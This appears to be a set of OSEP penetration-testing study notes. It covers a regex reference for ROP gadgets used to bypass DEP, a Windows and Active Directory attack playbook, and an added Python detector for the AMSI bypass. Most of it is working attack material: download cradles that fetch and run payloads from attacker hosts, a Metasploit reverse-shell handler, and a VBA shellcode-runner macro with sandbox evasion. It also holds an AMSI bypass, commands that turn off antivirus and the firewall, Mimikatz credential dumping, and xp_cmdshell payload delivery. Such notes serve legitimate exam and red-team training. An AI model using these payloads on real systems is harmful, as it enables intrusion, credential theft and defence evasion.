
Description: Exchange the values stored in the two registers.

### push REG1; pop REG2; ret;

Priority: `High`

RegEx: ```push [A-Za-z]+; pop [A-Za-z]+;```

Description: Assign a value to a register. Similar to ```mov REG2, REG1;```.

### push REG1; other instructions; pop REG2; ret;

Priority: `High`

RegEx: ```push [A-Za-z]+(.*); pop [A-Za-z]+```

Description: The value stored in register REG1 is assigned to register REG2, provided the instructions in between do not touch the stack.

## +1
### inc REG1; ret;

Priority: `High`

RegEx: ```inc [A-Za-z]+;```

Description: Can be used to move to the next argument.

Example: Register EAX points to the 2nd argument of VirtualAlloc; use the gadget ```inc eax; ret;``` 4 times to move to the 3rd argument.

### inc [REG1+offset]; ret;

Priority: `Medium`

RegEx: ```inc dword \[[A-Za-z]+([+-]0x[0-9A-Fa-f]+)*\]```

Description: Can be used to change the value of an argument slightly.

Example: Assume EAX points to the 2nd argument and the 3rd argument currently holds one less than the required value (for instance because its placeholder was negated to avoid a null byte); ```inc [eax+0x4]; ret;``` corrects it.

## -1
### dec REG1; ret;

Priority: `Medium`

RegEx: ```dec [A-Za-z]+;```

Description: Can be used to move to the previous argument.

### dec [REG1+offset]; ret;

Priority: `Medium`

RegEx: ```dec dword \[[A-Za-z]+([+-]0x[0-9A-Fa-f]+)*\]```

Description: Can be used to change the value of an argument slightly.

## Add Register
### add REG1, REG2; ret;

Priority: `High`

RegEx: ```add [A-Za-z]+, [A-Za-z]+;```

Description: Can be used to advance a pointer by an offset.

Example: Assume EAX points to the 2nd argument of VirtualAlloc and ECX holds the offset to the start of the shellcode; ```add eax, ecx; ret;``` makes EAX point into the shellcode area.

### add [REG1+offset], REG2; ret;

Priority: `High`

RegEx: ```add dword \[[A-Za-z]+([+-]0x[0-9A-Fa-f]+)*\], [A-Za-z]+```

Description: Can be used to change the value of an argument.

Example: Assume EAX points to the 2nd argument of VirtualAlloc and the 3rd argument was initialised with a placeholder because of bad characters; with the correction in ECX, ```add [eax+0x4], ecx; ret;``` patches the 3rd argument.

## Sub Register
### sub REG1, REG2; ret;

Priority: `High`

RegEx: ```sub [A-Za-z]+, [A-Za-z]+;```

Description: Can be used to move a pointer back by an offset (or forward, with a negated offset).

### sub [REG1+offset], REG2; ret;

Priority: `High`

RegEx: ```sub dword \[[A-Za-z]+([+-]0x[0-9A-Fa-f]+)*\], [A-Za-z]+;```

Description: Can be used to change the value of an argument.

## Negate Register
### neg REG1; ret;

Priority: `High`

RegEx: ```neg [A-Za-z]+;```

Description: Can be used to negate a fetched argument value.

Example: Assume ECX holds an argument value whose placeholder was negated to avoid a null byte; ```neg ecx; ret;``` restores the proper argument value.

### neg [REG1+offset]; ret;

Priority: `High`

RegEx: ```neg dword \[[A-Za-z]+([+-]0x[0-9A-Fa-f]+)*\];```

Description: Can be used to negate the value of an argument in place.

Example: Assume EAX points to the 2nd argument of VirtualAlloc and the 3rd argument holds a negated placeholder; ```neg [eax+0x4]; ret;``` restores it.

## Set Register 0
### xor REG1, REG1; ret;

Priority: `High`

RegEx: ```xor ([A-Za-z]+), \1;``` (the back-reference keeps `xor eax, ecx` out of the results)

Description: If the value of an argument is 0x0, prepare the value before patching the argument.

Example: Assume the value of an argument should be 0x0; ```xor ecx, ecx; ret;``` sets ECX to 0x0 before patching the argument.

### sub REG1, REG1; ret;

Priority: `Medium`

RegEx: ```sub ([A-Za-z]+), \1;```

Description: If the value of an argument is 0x0, prepare the value before patching the argument.

### mov REG1, 0; ret;

Priority: `Medium`

RegEx: ```mov [A-Za-z]+, 0x0+;```

Description: If the value of an argument is 0x0, prepare the value before patching the argument.

### and REG1, 0; ret;

Priority: `Medium`

RegEx: ```and [A-Za-z]+, 0x0+;```

Description: If the value of an argument is 0x0, prepare the value before patching the argument.

### push 0; pop REG1; ret;

Priority: `Medium`

RegEx: ```push 0x0+; pop [A-Za-z]+;```

Description: If the value of an argument is 0x0, prepare the value before patching the argument.

## pop
### pop REG1; ret;

Priority: `High`

RegEx: ```pop [A-Za-z]+;```

Description: Can be used to load a value prepared for an argument into a register from the chain.

Example: Before patching the value of an argument, use the gadget ```pop ecx; ret;``` (followed by the value in the chain) to set ECX.

## Decode byte
### add byte [REG1+offset], l-REG2/h-REG2; ret;

Priority: `High`

RegEx: ```add byte \[[A-Za-z]+([+-]0x[0-9A-Fa-f]+)*\], [A-Za-z]+```

Description: Decode a byte by adding a small value.

Example: ```add byte [eax], cl;``` or ```add byte [eax], ch;``` adds CL/CH to the byte at [eax].

### sub byte [REG1+offset], l-REG2/h-REG2; ret;

Priority: `High`

RegEx: ```sub byte \[[A-Za-z]+([+-]0x[0-9A-Fa-f]+)*\], [A-Za-z]+```

Description: Decode a byte by subtracting a small value.

Example: ```sub byte [eax], cl;``` or ```sub byte [eax], ch;``` subtracts CL/CH from the byte at [eax].

## Align EBP
### push REG1; pop ebp; ret;

Priority: `High`

RegEx: ```push [A-Za-z]+; pop ebp;```

Description: Can be used to align EBP with the function address on the stack.

Example: Assume register EAX points to the function address; ```push eax; pop ebp; ret;``` aligns EBP with the function address on the stack.

### xchg REG1, ebp; ret;

Priority: `High`

RegEx: ```xchg [A-Za-z]+, ebp;```

Description: Can be used to align EBP with the function address.

### xchg ebp, REG1; ret;

Priority: `High`

RegEx: ```xchg ebp, [A-Za-z]+;```

Description: Can be used to align EBP with the function address.

### push ebp; push REG1; pop REG2; pop REG3; ret;

Priority: `High`

RegEx: ```push ebp; push [A-Za-z]+; pop [A-Za-z]+; pop [A-Za-z]+;```

Description: Can be used to align EBP with the function address (REG3 receives the old EBP, REG2 receives REG1; useful when REG3 is EBP).

## EIP to ESP
### mov esp, ebp; pop ebp; ret;

Priority: `High`

RegEx: ```mov esp, ebp; pop ebp; ret;```

Description: Transfers execution to the address stored just above EBP: ESP becomes EBP, one dword is popped, and `ret` pops the next dword into EIP. With EBP pointing 4 bytes below the function address slot, this calls the function.

### leave; ret;

Priority: `High`

RegEx: ```leave;```

Description: Equivalent to the gadget ```mov esp, ebp; pop ebp; ret```.

### mov esp, REG1; ret;

Priority: `High`

RegEx: ```mov esp, [A-Za-z]+;```

Description: Align ESP with the function address on the stack.

Example: Assume register EAX points to the function address on the stack; ```mov esp, eax; ret;``` moves ESP there and the `ret` calls the function.

### xchg REG1, esp; ret;

Priority: `High`

RegEx: ```xchg [A-Za-z]+, esp;```

Description: Align ESP with the function address on the stack.

### xchg esp, REG1; ret;

Priority: `High`

RegEx: ```xchg esp, [A-Za-z]+;```

Description: Align ESP with the function address on the stack.
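The patterns in this reference applied to a gadget dump, as an added example that is not part of the notes: it normalises rp++-style lines to the compact `instr; instr;` form the patterns expect, tags each gadget with every category whose regex matches, and drops gadgets whose address contains a bad character (the "eliminate all bad characters" step of the DEP-bypass notes). The sample dump, the bad-character set and the lowercase register pattern are assumptions of the example.

```python
# Added example (not from the notes): apply the regexes in this quick
# reference to an rp++-style gadget dump. The sample dump is constructed.
# rp++ prints lowercase mnemonics with a space before each ';' and a
# trailing '(N found)', so lines are normalised to the 'instr; instr;' form
# the patterns expect before matching.
import re

REG = r"[a-z]+"
MEM = r"dword \[[a-z]+(?:[+-]0x[0-9a-f]+)*\]"
BYTE_MEM = r"byte \[[a-z]+(?:[+-]0x[0-9a-f]+)*\]"

CATEGORIES = {
    "save_esp": [rf"push esp(?:.*); pop {REG};", rf"lea {REG}, \[esp",
                 rf"mov {REG}, esp;", rf"(?:or|xor|add|sub) {REG}, esp;"],
    "deref": [rf"mov {REG}, {MEM};"],
    "write_what_where": [rf"mov {MEM}, {REG};"],
    "swap": [rf"mov {REG}, {REG};", rf"xchg {REG}, {REG};", rf"push {REG}(?:.*); pop {REG};"],
    "inc": [rf"inc {REG};", rf"inc {MEM};"],
    "dec": [rf"dec {REG};", rf"dec {MEM};"],
    "add": [rf"add {REG}, {REG};", rf"add {MEM}, {REG};"],
    "sub": [rf"sub {REG}, {REG};", rf"sub {MEM}, {REG};"],
    "neg": [rf"neg {REG};", rf"neg {MEM};"],
    "zero": [rf"xor ({REG}), \1;", rf"sub ({REG}), \1;", rf"mov {REG}, 0x0+;",
             rf"and {REG}, 0x0+;", rf"push 0x0+; pop {REG};"],
    "pop": [rf"pop {REG};"],
    "decode_byte": [rf"(?:add|sub) {BYTE_MEM}, [a-d][lh];"],
    "align_ebp": [rf"push {REG}; pop ebp;", rf"xchg {REG}, ebp;", rf"xchg ebp, {REG};",
                  rf"push ebp; push {REG}; pop {REG}; pop {REG};"],
    "eip_to_esp": [r"mov esp, ebp; pop ebp; ret;", r"leave;", rf"mov esp, {REG};",
                   rf"xchg {REG}, esp;", rf"xchg esp, {REG};"],
}

# Constructed rp++-style output; addresses chosen so two of them contain a bad character.
SAMPLE_DUMP = """\
0x10015a2c: push esp ; mov eax, ecx ; pop esi ; ret  ;  (1 found)
0x1001b3f1: mov eax, dword [esi+0x04] ; ret  ;  (2 found)
0x10022a0d: xor eax, eax ; ret  ;  (1 found)
0x1002c4e0: xor eax, ecx ; ret  ;  (1 found)
0x10031110: add byte [eax], cl ; ret  ;  (1 found)
0x10040a22: mov esp, ebp ; pop ebp ; ret  ;  (3 found)
0x10051234: leave ; ret  ;  (5 found)
0x10060ff0: push eax ; pop ebp ; ret  ;  (1 found)
"""


def normalise(line):
    """'0x...: push esp ; pop esi ; ret  ;  (1 found)' -> (addr, 'push esp; pop esi; ret;')"""
    addr, _, body = line.partition(": ")
    body = re.sub(r"\s*\(\d+ found\)\s*$", "", body)
    body = re.sub(r"\s*;\s*", "; ", body).strip()
    return int(addr, 16), body


def classify(body):
    """Every category whose patterns match the normalised gadget text."""
    return sorted(name for name, patterns in CATEGORIES.items()
                  if any(re.search(p, body) for p in patterns))


def address_ok(addr, badchars):
    """The gadget address itself has to survive the bad-character filter."""
    return not any(b in badchars for b in addr.to_bytes(4, "little"))


def search(dump, category, badchars=b"\x00\x0a\x0d"):
    """Gadgets of one category whose address contains no bad character."""
    hits = []
    for line in dump.splitlines():
        if not line.startswith("0x"):
            continue
        addr, body = normalise(line)
        if category in classify(body) and address_ok(addr, badchars):
            hits.append((addr, body))
    return hits
```

A gadget can land in several categories at once (`push esp; mov eax, ecx; pop esi; ret;` is a save-ESP gadget, a swap and a pop), which is intended: the point of the list is to find candidates, and the `pop` tag in particular is a reminder that the gadget consumes a dword from the chain. With the default bad characters the only `xor eax, eax` in the sample is unusable because its address ends in 0x0d, so `search(SAMPLE_DUMP, "zero")` comes back empty until that byte is dropped from the filter.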

--------------------------------------------------------------------------------
/OSEP.md:
--------------------------------------------------------------------------------
# OSEP Exploitation Flow
## Common Commands
### Encode PowerShell payload
The result is the UTF-16LE, base64-encoded command that `powershell -enc <base64>` expects.

- On Windows:
```powershell
[system.convert]::tobase64string([system.text.encoding]::unicode.getbytes('IEX ((new-object net.webclient).downloadstring("http://192.168.x.y/runner.txt"))'))
```
- On Linux:
```bash
echo -en 'IEX ((new-object net.webclient).downloadstring("http://192.168.x.y/runner.txt"))' | iconv -t UTF-16LE | base64 -w 0
```
### Save a ticket to file

- On Windows
```powershell
[System.IO.File]::WriteAllBytes("C:\windows\temp\bob.kirbi", [System.Convert]::FromBase64String("xxxxxx="))
```
- On Linux
```bash
echo '…' | base64 -d > bob.kirbi
```
### List tickets

- Mimikatz
```powershell
sekurlsa::tickets
```
- Rubeus
```powershell
rubeus.exe triage
```
- Operating System
```powershell
klist
```

### Export a ticket

- Mimikatz
```powershell
sekurlsa::tickets /export
```
- Rubeus
```powershell
rubeus.exe dump /luid:0x3e4 /service:krbtgt /nowrap
```

### Import a ticket

- Mimikatz
```powershell
kerberos::ptt ticket.kirbi
```
- Rubeus
```powershell
rubeus.exe ptt /ticket:doIF…
```

### Hash to Password

- NTLM
```bash
hashcat -a 0 -m 1000 hash.txt dict/rockyou.txt
```
- Net-NTLMv2
```bash
john --wordlist=dict/rockyou.txt hash.txt

hashcat -m 5600 hash.txt dict/rockyou.txt --force
```
- Kerberoasting
```bash
john --format=krb5tgs --wordlist=dict/rockyou.txt hash.txt
```
- ASREPRoasting
```bash
hashcat -a 0 -m 18200 hash.txt dict/rockyou.txt

john --format=krb5asrep --wordlist=dict/rockyou.txt hash.txt
```

### Password to Hash
```powershell
rubeus.exe hash /domain:red.com /user:rbcd$ /password:123
```

### Use of ticket

- Mimikatz
```powershell
kerberos::ptt ticket.kirbi
```
- Rubeus:
```powershell
rubeus.exe ptt /ticket:doIF…
```

### Use of hash

- Mimikatz
```powershell
sekurlsa::pth /user:admin /domain:blue /ntlm:2892D26CDF84D7A70E2EB3B9F05C425E /run:"mstsc.exe /restrictedadmin"
```
- Evil-WinRM
```bash
evil-winrm -i 192.168.10.10 -u alice -H [hash]
```
- xfreerdp
```bash
xfreerdp /v:192.168.10.10 /u:alice /pth:[hash] /d:red.com /dynamic-resolution
```

### SID and Name

- SID to Name
```powershell
convertfrom-sid S-1-5-21-3776646582-2086779273-4091361643-1601
```
- Domain name to domain SID:
```powershell
Get-DomainSID -Domain child.red.com
```

## C2 Preparations
### Metasploit
```bash
msfconsole -x "use exploit/multi/handler; set PAYLOAD windows/x64/meterpreter/reverse_https; set LHOST 192.168.x.y; set LPORT 443; set ExitOnSession false; run -zj"
```

## Initial Compromise
### Word Macro
- VBA Shellcode Runner (x86)
```vba
Private Declare PtrSafe Function CreateThread Lib "KERNEL32" (ByVal SecurityAttributes As Long, ByVal StackSize As Long, ByVal StartFunction As LongPtr, ThreadParameter As LongPtr, ByVal CreateFlags As Long, ByRef ThreadId As Long) As LongPtr
Private Declare PtrSafe Function VirtualAlloc Lib "KERNEL32" (ByVal lpAddress As LongPtr, ByVal dwSize As Long, ByVal flAllocationType As Long, ByVal flProtect As Long) As LongPtr
Private Declare PtrSafe Function RtlMoveMemory Lib "KERNEL32" (ByVal lDestination As LongPtr, ByRef sSource As Any, ByVal lLength As Long) As LongPtr
Private Declare PtrSafe Function Sleep Lib "KERNEL32" (ByVal mili As Long) As Long
Private Declare PtrSafe Function FlsAlloc Lib "KERNEL32" (ByVal callback As LongPtr) As LongPtr

Function mymacro()
    Dim allocRes As LongPtr
    Dim buf As Variant
    Dim addr As LongPtr
    Dim counter As Long
    Dim data As Long
    Dim res As Long
    Dim t1 As Date
    Dim t2 As Date
    Dim time As Long

    ' Sandbox check 1: FlsAlloc is not emulated by some sandboxes
    allocRes = FlsAlloc(0)
    If IsNull(allocRes) Then
        End
    End If

    ' Sandbox check 2: a sandbox that fast-forwards Sleep returns too early
    t1 = Now()
    Sleep (2000)
    t2 = Now()
    time = DateDiff("s", t1, t2)
    If time < 2 Then
        Exit Function
    End If

    ' Shellcode bytes, each XORed with 188 (decoded below)
    buf = Array(...)
    For i = 0 To UBound(buf)
        buf(i) = buf(i) Xor 188
    Next i

    ' RWX allocation, byte-wise copy, then a new thread on the buffer
    addr = VirtualAlloc(0, UBound(buf), &H3000, &H40)
    For counter = LBound(buf) To UBound(buf)
        data = buf(counter)
        res = RtlMoveMemory(addr + counter, data, 1)
    Next counter
    res = CreateThread(0, 0, addr, 0, 0, 0)
End Function

Sub Document_Open()
    mymacro
End Sub

Sub AutoOpen()
    mymacro
End Sub
```
- VBA PowerShell Download Cradle
```vba
Function MyMacro()
    Dim Apples As String
    Dim Water As String

    ' Only run from the document it was delivered in (name stored XOR-encoded)
    If ActiveDocument.Name <> Nuts("...") Then
        Exit Function
    End If

    Apples = "..."
236 | 237 | Water = Nuts(Apples) 238 | 239 | GetObject(Nuts("...")).Get(Nuts("...")).Create Water, Tea, Coffee, Napkin 240 | 241 | End Function 242 | 243 | Function Pears(Beets) 244 | 245 | Pears = Chr(Beets Xor 188) 246 | 247 | End Function 248 | 249 | Function Strawberries(Grapes) 250 | 251 | Strawberries = Left(Grapes, 3) 252 | 253 | End Function 254 | 255 | Function Almonds(Jelly) 256 | 257 | Almonds = Right(Jelly, Len(Jelly) - 3) 258 | 259 | End Function 260 | 261 | Function Nuts(Milk) 262 | 263 | Do 264 | 265 | Oatmilk = Oatmilk + Pears(Strawberries(Milk)) 266 | 267 | Milk = Almonds(Milk) 268 | 269 | Loop While Len(Milk) > 0 270 | 271 | Nuts = Oatmilk 272 | 273 | End Function 274 | 275 | Sub Document_Open() 276 | 277 | MyMacro 278 | 279 | End Sub 280 | 281 | Sub AutoOpen() 282 | 283 | MyMacro 284 | 285 | End Sub 286 | ``` 287 | 288 | ### Phishing 289 | - HTA 290 | - Web Shell 291 | ```csharp 292 | <%@ Page Language="C#" AutoEventWireup="true" %> 293 | 294 | <%@ Import Namespace="System.IO" %> 295 | 296 | <%@ Import Namespace="System.Diagnostics" %> 297 | 298 | <%@ Import Namespace="System.Runtime.InteropServices" %> 299 | 300 | <%@ Import Namespace="System.Net" %> 301 | 302 | <%@ Import Namespace="System.Text" %> 303 | 304 | <%@ Import Namespace="System.Threading" %> 305 | 306 | 393 | ``` 394 | 395 | ### Code Execution 396 | - Cmd 397 | ```powershell 398 | powershell -exec bypass iex (new-object net.webclient).downloadstring('http://192.168.x.y/run.txt') 399 | ``` 400 | 401 | ## Local Reconnaissance On Linux 402 | ### Bash History 403 | 404 | - Check current user's bash history 405 | 406 | - Check every user's bash history after escalating to root 407 | 408 | ### SSH Key 409 | 410 | - id_rsa 411 | 412 | Could in other name such as **bob.key** 413 | 414 | /home/bob/.ssh/id_rsa could be alice's private key 415 | 416 | - known_host (Which you can access) 417 | 418 | Servers that current user's private key can access. 
Could be hashed 419 | 420 | - authorized_key 421 | 422 | Clients have been connected to this server as current user 423 | 424 | ### Credential in config/text files 425 | 426 | - Config file of web app 427 | 428 | - Credential reuse 429 | 430 | ### Database 431 | 432 | - Stored Credential in table 433 | 434 | - Credential reuse 435 | 436 | ### sudo -l 437 | 438 | - GTFOBins 439 | 440 | ### suid 441 | 442 | - GTFOBins 443 | 444 | ### SSH control master 445 | 446 | A ->B: A has a session on B, piggybacking A's access to B 447 | ``` 448 | ~/.ssh/config or /etc/ssh/ssh_config 449 | ``` 450 | 451 | Any socket file like kevin@web03:22 in `/home/kevin/.ssh/controlmaster` 452 | 453 | `ssh kevin@web03` 454 | 455 | If logged in as root 456 | 457 | `ssh -S /home/alice/.ssh/controlmaster\@alice@web03\:22 alice@web03` 458 | 459 | ### SSH Agent Forwarding 460 | 461 | A -> B -> C: A has a session on B, and A's private key can access to both B and C 462 | 463 | On B to access C 464 | 465 | Normal user 466 | ``` 467 | ssh alice@web03 468 | ``` 469 | Privileged User 470 | ``` 471 | SSH_AUTH_SOCK=/tmp/ssh-xxx ssh-add -l 472 | 473 | SSH_AUTH_SOCK=/tmp/ssh-xxx ssh alice@web03 474 | ``` 475 | ### ccache file 476 | 477 | - Contain request Kerberos tickets 478 | ```bash 479 | /tmp/krb5cc_jack 480 | ``` 481 | - Convert ccache to kirbi file 482 | ```bash 483 | export KRB5CCNAME=/tmp/krb5cc_george 484 | ``` 485 | ### /etc/krb5.keytab 486 | 487 | - Can be used for Kerberos authentication 488 | 489 | ### keytab file 490 | 491 | - Contain Kerberos principle name and encrypted keys 492 | ```bash 493 | /tmp/alice.keytab 494 | 495 | /etc/crontab 496 | 497 | kinit alice@red.com -k -t /tmp/alice.keytab 498 | ``` 499 | ### pspy 500 | 501 | - Hidden cronjobs (Could contain credentials) 502 | 503 | ### /opt/pbis 504 | 505 | - Enumerate domain on Linux 506 | 507 | - Make use of keytab and ccache file 508 | 509 | ### Ansiblebook 510 | 511 | Node hosts: `/etc/ansible/hosts` 512 | 513 | Playbook 514 | 515 | 
Execute commands on node servers 516 | 517 | Retrieve credentials of node servers from playbook 518 | ```bash 519 | python3 /usr/share/john/ansible2john.py web.yaml 520 | 521 | hashcat hash.txt --force --hash-type=16900 dict/rockyou.txt 522 | 523 | cat pw.txt | ansible-vault decrypt 524 | ``` 525 | Sensitive data 526 | 527 | Playbook contains a command, the command contains plaintext credential. Like mysql.yml 528 | 529 | /var/log/syslog 530 | 531 | ### Jfrog 532 | 533 | Binary Repository Manager 534 | 535 | Port 8082 536 | ``` 537 | ps aux | grep artifactory 538 | ``` 539 | - Check existing files and user interactions like creation, download, etc. 540 | 541 | - Delivery malicious file (With user interaction) 542 | 543 | - Database backup contains credential: ```/opt/jfrog/artifactory/var/backup/access``` 544 | 545 | - Compromise database 546 | 547 | ## Local Reconnaissance On Windows 548 | ### CLM 549 | 550 | - Check CLM 551 | ```powershell 552 | $ExecutionContext.SessionState.LanguageMode 553 | ``` 554 | - Bypass CLM 555 | ```powershell 556 | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe /logfile= /LogToConsole=false /U "C:\Windows\Tasks\clm.exe" 557 | ``` 558 | ### AMSI 559 | 560 | - Check AMSI 561 | ```powershell 562 | 'amsiutils' 563 | ``` 564 | - Disable AMSI 565 | ```powershell 566 | $a=[Ref].Assembly.GetTypes();Foreach($b in $a) {if ($b.Name -like "*iUtils") {$c=$b}};$d=$c.GetFields('NonPublic,Static');Foreach($e in $d) {if ($e.Name -like "*Failed") {$f=$e}};$f.SetValue($null,$true) 567 | ``` 568 | ### Enumerate Domain 569 | ```powershell 570 | iex (new-object net.webclient).downloadstring("http://192.168.x.y/tools/sharphound.ps1") 571 | Invoke-BloodHound -CollectionMethod All -Verbose 572 | 573 | SharpHound.exe -c All,GPOLocalGroup,LoggedOn --domain final.com --ldapusername nina --ldappassword 'PasswordRulon123!' 
574 | 575 | ipmo .\adpeas.ps1 576 | 577 | Invoke-adPEAS 578 | ``` 579 | ### LAPS 580 | 581 | - Check LAPS 582 | ```powershell 583 | ipmo powerview.ps1 584 | 585 | get-netcomputer -Filter "(ms-mcs-admpwdexpirationtime=*)" | select dnshostname 586 | 587 | ``` 588 | - Read Password 589 | ```powershell 590 | ipmo powerview.ps1 591 | 592 | get-netcomputer -Filter "(ms-mcs-admpwd=*)" | select dnshostname,ms-mcs-admpwd 593 | ``` 594 | ### AppLocker 595 | 596 | - Check AppLocker 597 | ```powershell 598 | Get-ChildItem -Path HKLM:\SOFTWARE\Policies\Microsoft\Windows\SrpV2\Exe 599 | ``` 600 | - Bypass AppLocker 601 | 602 | ### PPL 603 | 604 | - Check PPL 605 | ```powershell 606 | Get-ItemProperty -Path HKLM:\SYSTEM\CurrentControlSet\Control\Lsa -Name "RunAsPPL" 607 | ``` 608 | - Remove PPL 609 | ```cmd 610 | mimikatz.exe "privilege::debug" "!+" "!processprotect /process:lsass.exe /remove" "sekurlsa::logonpasswords"exit 611 | ``` 612 | ### Shutdown AV and Firewall 613 | 614 | - In PowerShell 615 | ```powershell 616 | Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true 617 | 618 | netsh advfirewall set allprofiles state off 619 | ``` 620 | - In RDP 621 | 622 | Manually shut down WD. 
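The AMSI reflection one-liner in the AMSI section above leaves a recognisable footprint in PowerShell script block logging (Event ID 4104). The following detection logic is an added example, not part of these notes; the script block samples are constructed, and the indicator names are made up for this example.

```python
"""Flag the AMSI-disable reflection pattern in PowerShell script block text.

Added example for defenders; sample blocks below are constructed, not real logs.
The matcher is deliberately simple: string-splitting or format-operator
obfuscation of the same one-liner will evade it, which is why AMSI and
script block logging should be correlated rather than relied on alone.
"""
import re

# Constructed sample script block contents (not real 4104 events).
SAMPLE_SCRIPT_BLOCKS = [
    # 0: benign file listing
    "Get-ChildItem -Path C:\\Users -Recurse | Select-Object Name",
    # 1: wildcard-reflection form, as written in the notes
    """$a=[Ref].Assembly.GetTypes();Foreach($b in $a) {if ($b.Name -like "*iUtils") {$c=$b}};$d=$c.GetFields('NonPublic,Static');Foreach($e in $d) {if ($e.Name -like "*Failed") {$f=$e}};$f.SetValue($null,$true)""",
    # 2: direct-name form of the same technique
    "[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils')."
    "GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$true)",
    # 3: benign reflection that should not fire
    "[Ref].Assembly.GetTypes() | Where-Object { $_.Name -like '*Cmdlet' } | Select-Object -First 5",
]

# Each indicator is one building block of the bypass; none is conclusive alone.
INDICATORS = {
    "reflection_on_automation_assembly": re.compile(r"\[ref\]\s*\.\s*assembly", re.I),
    "amsi_type_lookup": re.compile(r"amsiutils|-like\s*['\"]\*iutils['\"]", re.I),
    "amsi_field_lookup": re.compile(r"amsiinitfailed|-like\s*['\"]\*failed['\"]", re.I),
    "nonpublic_static_field": re.compile(r"nonpublic\s*,\s*static", re.I),
    "setvalue_true": re.compile(r"setvalue\s*\(\s*\$null\s*,\s*\$true\s*\)", re.I),
}


def score_script_block(text: str) -> dict:
    """Return the matched indicator names and a verdict for one script block."""
    hits = [name for name, rx in INDICATORS.items() if rx.search(text)]
    # Writing $true into a static non-public field is the decisive step; require
    # it plus at least two supporting indicators to avoid firing on ordinary reflection.
    if "setvalue_true" in hits and len(hits) >= 3:
        verdict = "amsi_bypass"
    else:
        verdict = "clean"
    return {"verdict": verdict, "indicators": hits}


def scan(blocks) -> list:
    """Score every block; returns (index, result) pairs in input order."""
    return [(i, score_script_block(b)) for i, b in enumerate(blocks)]


def flagged_indexes(blocks) -> list:
    """Indexes of blocks that look like the AMSI bypass."""
    return [i for i, r in scan(blocks) if r["verdict"] == "amsi_bypass"]


if __name__ == "__main__":
    for i, result in scan(SAMPLE_SCRIPT_BLOCKS):
        print(i, result["verdict"], ",".join(result["indicators"]))
```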
### Local Enumeration

- whoami /priv
- Files and directories
```
C:\program files\

C:\program files (x86)\

C:\users\bob\documents

C:\users\bob\desktop

C:\users\bob\.ssh

C:\program files\setup\mail.ps1

C:\inetpub\wwwroot\login.aspx (if the web app uses MSSQL)
```
- Local sessions: available tokens of other users/services
- Vulnerable service
```powershell
ipmo .\powerup.ps1

invoke-allchecks

# sc.exe, not the PowerShell alias sc (Set-Content); sc.exe needs "option= value"
sc.exe qc vuln

sc.exe config vuln start= demand                 # change the start type

sc.exe config vuln obj= "NT AUTHORITY\SYSTEM"    # change the account the service runs as

Invoke-ServiceAbuse -Name 'vuln' -UserName 'red\alice'   # abuse
```

### SQL Server Instance

- Instance
```powershell
get-sqlinstancelocal

get-sqlinstancedomain

Get-SQLConnectionTest -Instance "srv-1.red.com,1433"
```
- Server Info
```powershell
get-sqlserverinfo -instance "redsql\sqlexpress"
```
- Privilege Enumeration

Sysadmin logins/users
```powershell
Get-SQLQuery -Instance 'red.com,1433' -query "select name from master..syslogins where sysadmin=1;"
```
Users/logins that can be impersonated
```powershell
Get-SQLQuery -Instance 'red.com,1433' -query "SELECT distinct b.name FROM sys.server_permissions a INNER JOIN sys.server_principals b ON a.grantor_principal_id = b.principal_id WHERE a.permission_name = 'IMPERSONATE';"
```
- Linked Servers

Not all users can see all links
```sql
select * from master..sysservers;

exec sp_linkedservers;
```
```powershell
get-sqlserverlinkcrawl -instance "cywebdw\sqlexpress" -username webapp11 -password 89543dfGDFGH4d

# OpenQuery through the link
get-sqlquery -instance "CYWEBDW\SQLEXPRESS" -query "select * from openquery(""m3sqlw.red.local"",'select * from master..sysservers')"
```
- Value of xp_cmdshell
```sql
select * from sys.configurations where name='xp_cmdshell'
```
```powershell
get-sqlquery -instance "CYWEBDW\SQLEXPRESS" -query "select * from sys.configurations where name ='xp_cmdshell'"

# OpenQuery through the link
get-sqlquery -instance "CYWEBDW\SQLEXPRESS" -query "select * from openquery (""m3sqlw.red.local"",'select * from sys.configurations where name=''xp_cmdshell''')"
```
- Enable xp_cmdshell
```sql
EXEC sp_configure 'show advanced options', 1; RECONFIGURE; EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE;

exec xp_cmdshell 'whoami';
```
```powershell
get-sqlquery -instance "CYWEBDW\SQLEXPRESS" -query "EXEC sp_configure 'show advanced options', 1; RECONFIGURE; EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE;EXEC master.dbo.xp_cmdshell 'whoami';"

# One hop over a linked server
get-sqlquery -instance "web06\sqlexpress" -query "exec ('sp_configure ''show advanced options'', 1; reconfigure; exec sp_configure ''xp_cmdshell'', 1; reconfigure;') AT sql03; exec('xp_cmdshell ''hostname'';') at SQL03" -username sa -password Passw0rd
```
- xp_cmdshell Meterpreter Shell
```bash
# Encode the payload
echo -en 'IEX ((new-object net.webclient).downloadstring("http://10.10.14.111/runner64.txt"))' | iconv -t UTF-16LE | base64 -w 0
```
```sql
exec xp_cmdshell 'powershell -w hidden -enc <...>'
```
```powershell
Invoke-SQLOSCmd -Instance "CYWEBDW\SQLEXPRESS" -Command "powershell -w hidden -enc <...> " -RawResults

get-sqlquery -instance "CYWEBDW\SQLEXPRESS" -query "EXEC('xp_cmdshell ''powershell -w hidden -enc <...> '' ; ' ) "

# One hop over a linked server
get-sqlquery -instance "CYWEBDW\SQLEXPRESS" -query "EXEC('xp_cmdshell ''powershell -w hidden -enc <...> '' ; ' )AT [m3sqlw.red.local]"
```
- Enable RPC Out
```sql
execute as login='sa'; exec sp_serveroption 'sql03', 'rpc out', 'true';
```
```powershell
get-sqlquery -instance "cywebdb\sqlexpress" -query "execute as login ='sa'; exec sp_serveroption 'm3sqlw.red.local', 'rpc out', 'true'"

# Through the link
get-sqlquery -instance "cywebdb\sqlexpress" -query "execute as login ='sa'; exec (sp_serveroption 'm3sqlw.red.local', 'rpc out', 'true') at [m3sqlw.red.local]"
```
### Privilege escalation does not have to be done immediately

DAs or some specific domain users may already have admin privileges on the current host.

### Password/Hash reuse

Similar machines could share the same password/hash:

- SQL01 and SQL02
- SQL01 and File01

## Domain Reconnaissance on Kali
### BloodHound
```bash
proxychains bloodhound-python -c ALL -u kevin -p 'Passw0rd' -d red.com -dc dc.red.com -ns 10.9.20.10 --dns-tcp
```
or
```bash
# NTLM hash extracted from /etc/krb5.keytab
